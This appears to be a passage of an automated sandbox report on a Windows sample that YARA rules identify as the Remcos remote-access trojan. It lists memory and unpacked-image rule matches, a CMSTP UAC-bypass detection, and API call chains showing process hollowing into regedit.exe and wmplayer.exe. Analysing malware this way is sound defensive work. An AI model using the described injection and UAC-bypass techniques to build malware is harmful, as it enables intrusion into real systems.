                    Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Uses regedit.exe to modify the Windows registry
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess Stats: CPU usage > 49%
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,6_2_00417245
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,6_2_0041ACC1
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,6_2_0041ACED
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,6_2_004158B9
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeCode function: 0_2_00007FF848B631400_2_00007FF848B63140
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeCode function: 0_2_00007FF848B6BD1A0_2_00007FF848B6BD1A
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeCode function: 0_2_00007FF848B62A2C0_2_00007FF848B62A2C
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeCode function: 0_2_00007FF848B6A8910_2_00007FF848B6A891
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041D0716_2_0041D071
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004520D26_2_004520D2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0043D0986_2_0043D098
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004371506_2_00437150
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004361AA6_2_004361AA
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004262546_2_00426254
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004313776_2_00431377
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0043651C6_2_0043651C
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041E5DF6_2_0041E5DF
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0044C7396_2_0044C739
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004367C66_2_004367C6
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004267CB6_2_004267CB
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0043C9DD6_2_0043C9DD
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00432A496_2_00432A49
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00436A8D6_2_00436A8D
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0043CC0C6_2_0043CC0C
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00436D486_2_00436D48
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00434D226_2_00434D22
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00426E736_2_00426E73
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00440E206_2_00440E20
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0043CE3B6_2_0043CE3B
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00412F456_2_00412F45
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00452F006_2_00452F00
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00426FAD6_2_00426FAD
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_100171946_2_10017194
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_1000B5C16_2_1000B5C1
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044B04013_2_0044B040
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0043610D13_2_0043610D
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044731013_2_00447310
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044A49013_2_0044A490
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0040755A13_2_0040755A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0043C56013_2_0043C560
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044B61013_2_0044B610
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044D6C013_2_0044D6C0
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_004476F013_2_004476F0
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044B87013_2_0044B870
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044081D13_2_0044081D
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0041495713_2_00414957
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_004079EE13_2_004079EE
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00407AEB13_2_00407AEB
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044AA8013_2_0044AA80
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00412AA913_2_00412AA9
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00404B7413_2_00404B74
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00404B0313_2_00404B03
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0044BBD813_2_0044BBD8
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00404BE513_2_00404BE5
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00404C7613_2_00404C76
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00415CFE13_2_00415CFE
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00416D7213_2_00416D72
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00446D3013_2_00446D30
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00446D8B13_2_00446D8B
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00406E8F13_2_00406E8F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0040503814_2_00405038
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0041208C14_2_0041208C
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_004050A914_2_004050A9
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0040511A14_2_0040511A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0043C13A14_2_0043C13A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_004051AB14_2_004051AB
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0044930014_2_00449300
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0040D32214_2_0040D322
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0044A4F014_2_0044A4F0
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0043A5AB14_2_0043A5AB
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0041363114_2_00413631
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0044669014_2_00446690
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0044A73014_2_0044A730
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_004398D814_2_004398D8
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_004498E014_2_004498E0
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0044A88614_2_0044A886
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0043DA0914_2_0043DA09
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00438D5E14_2_00438D5E
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00449ED014_2_00449ED0
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_0041FE8314_2_0041FE83
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00430F5414_2_00430F54
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_004050C215_2_004050C2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_004014AB15_2_004014AB
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_0040513315_2_00405133
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_004051A415_2_004051A4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_0040124615_2_00401246
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_0040CA4615_2_0040CA46
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_0040523515_2_00405235
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_004032C815_2_004032C8
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_0040168915_2_00401689
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00402F6015_2_00402F60
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 00433FB0 appears 55 times
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 004020E7 appears 40 times
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 004338A5 appears 41 times
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 00416760 appears 69 times
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1220 -s 1600
                    Source: IB9876789000.bat.exeStatic PE information: No import functions for PE file found
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEjeyuvijuqoyi2 vs IB9876789000.bat.exe
                    Source: IB9876789000.bat.exeBinary or memory string: OriginalFilenamePatekPorot.exe4 vs IB9876789000.bat.exe
                    Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
